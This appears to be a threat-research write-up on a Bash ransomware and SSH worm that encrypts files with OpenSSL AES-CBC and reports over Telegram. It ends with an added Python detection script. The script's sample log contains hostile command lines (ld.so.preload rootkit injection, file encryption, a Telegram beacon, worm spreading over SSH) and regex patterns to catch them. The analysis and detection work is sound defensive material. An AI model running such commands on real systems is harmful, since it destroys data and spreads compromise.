A recently discovered Bash ransomware piqued our interest in multiple ways. Upon investigating, we found that the attack chain is fully implemented as a bash script, but it also seems that the scripts are still under development.

The hack tools URL with the ransomware information was initially reported by a Twitter user. In the next sections of this blog, we analyze the content of the “api_attack/” directory, which contains the Secure Shell (SSH) worm and the ransomware script. We also found that most components of this attack have very low detection numbers in VirusTotal. The worm and ransomware scripts also use the API of the messaging application Telegram for command-and-control (C&C) communication. Most components of this attack mainly target Red Hat and CentOS Linux distributions; however, some scripts include Debian-based Linux distributions as well.

The following is a list and overview of the hacking tools. We’ve observed that some of these scripts are based on open-source code. For example, binaryinject1.so is a modified version of a rootkit called “libprocesshider” that hides a process under Linux using the dynamic loader’s preload mechanism, and “pwd.c” (“CVE-2017-1000253.c”) is a publicly available exploit for CentOS 7 kernel versions 3.10.0-514.21.2.el7.x86_64 and 3.10.0-514.26.1.el7.x86_64.

In the previous section, we talked about the SSH worm script, which receives the credential configuration as a base64 parameter and uses it against target systems to download and execute the ransomware. Looking at the various iterations of the ransomware in this section, we investigate the script called “supermicro_cr_third”, which seems to be the latest version.

The ransomware is written in bash script and targets Red Hat/CentOS and Debian Linux distributions. The malware uses OpenSSL’s AES algorithm in CBC mode to encrypt files in various directories. It also uses Telegram’s API to send an infection status to the threat actor(s). We observed that this script is heavily under development, and the various versions of this ransomware are all similar, with only minor changes. Some functions are commented out by the malware author, while others are not used (dead code) in some cases.
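The behaviours described above (bulk OpenSSL AES-CBC file encryption, Telegram API beaconing, an LD_PRELOAD-style process hider, compilation of the CVE-2017-1000253 exploit, and SSH-based spreading) each leave a recognisable command line in shell history or audit logs. The following detection rules and per-host scoring are an added example, not code from the original post or from the malware; the log lines, rule weights and threshold are constructed assumptions.

```python
import re

# Constructed sample command-line records, (host, command), as a log collector
# or auditd exec-logging might record them. Not taken from the original post.
SAMPLE_LOG = [
    ("web01", "openssl enc -aes-256-cbc -salt -in /var/www/html/index.php -out /var/www/html/index.php.enc"),
    ("web01", "curl -s https://api.telegram.org/bot<TOKEN>/sendMessage -d chat_id=1 -d text=encrypted"),
    ("db01", "echo /usr/local/lib/binaryinject1.so >> /etc/ld.so.preload"),
    ("build02", "gcc -o pwd CVE-2017-1000253.c"),
    ("web02", "openssl dgst -sha256 release.tar.gz"),   # benign openssl use, must not match
    ("db01", "ssh -o StrictHostKeyChecking=no root@10.0.0.5 'bash -s' < supermicro_cr_third"),
]

# One rule per behaviour from the write-up: (name, pattern, weight). Weights are an assumption.
RULES = [
    ("aes_cbc_file_encryption", re.compile(r"openssl\s+enc\b.*-aes-\d+-cbc"), 3),
    ("telegram_api_beacon", re.compile(r"api\.telegram\.org/bot"), 3),
    ("ld_preload_rootkit", re.compile(r"/etc/ld\.so\.preload|LD_PRELOAD="), 4),
    ("privesc_exploit_build", re.compile(r"CVE-2017-1000253"), 4),
    ("ssh_worm_spread", re.compile(r"\bssh\b.*StrictHostKeyChecking=no"), 2),
]


def match_rules(command):
    """Return the names of all rules that fire on a single command line."""
    return [name for name, pattern, _ in RULES if pattern.search(command)]


def score_hosts(log, threshold=5):
    """Aggregate weighted rule hits per host and return only hosts at or above threshold.

    Result: {host: (score, sorted list of distinct rule names)}. Scoring per host rather
    than per line lets weak signals (e.g. one ssh spread attempt) combine with strong ones.
    """
    scores, hits = {}, {}
    for host, command in log:
        for name, pattern, weight in RULES:
            if pattern.search(command):
                scores[host] = scores.get(host, 0) + weight
                hits.setdefault(host, set()).add(name)
    return {h: (scores[h], sorted(hits[h])) for h in scores if scores[h] >= threshold}


if __name__ == "__main__":
    for host, (score, names) in score_hosts(SAMPLE_LOG).items():
        print(f"{host}: score={score} indicators={names}")
```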